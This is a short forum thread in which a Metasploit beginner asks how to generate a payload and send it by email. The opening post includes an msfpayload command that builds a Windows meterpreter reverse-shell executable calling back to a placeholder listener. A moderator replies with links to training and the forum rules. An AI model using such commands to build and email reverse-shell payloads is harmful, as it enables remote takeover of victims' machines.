Thread: New to meterpreter

Just burned his ISO

Default New to meterpreter

I'm new with the whole msf thing but i have done a lot of reading concerning it. Still, there are some things that i have always are bugging me. When to use,

./msfpayload windows/meterpreter/reverse_tcp LHOST=A.B.C.D LPORT=8080 R | ./msfencode -b '' -t exe -o meterpreter.exe

and

set RHOST 10.1.1.2 ==> Target
    set RPORT

From what i read, the "msfpayload windows/...." is to create the payload and one of the next step consist of sending that payload to someone's email as an attachment... How is it done?
    What i meant was, once i typed in the code, does it "created" itself? or do i have to "create" it then type in the code? and where can i find it (in what folder) once it's done so i can send it?

I have two computers ( laptop and a desktop) i want to use metasploit on my laptop to create a payload then send it to an email address on me desktop then get into my desktop through, how do you start?
    What i am trying to figure out are; when to create the payload? When to send it? How to send it as an attachment? and when to use the RHOST?

Thanks for your time and consideration

Super Moderator Archangel-Amael's Avatar

Might want to look into the metasploit unleashed training here
    http://www.offensive-security.com/blog/
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

You do it like you would for any other type of email attachment you want to send...
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

Just burned his ISO

Thanks archangel.amael but the site isn't working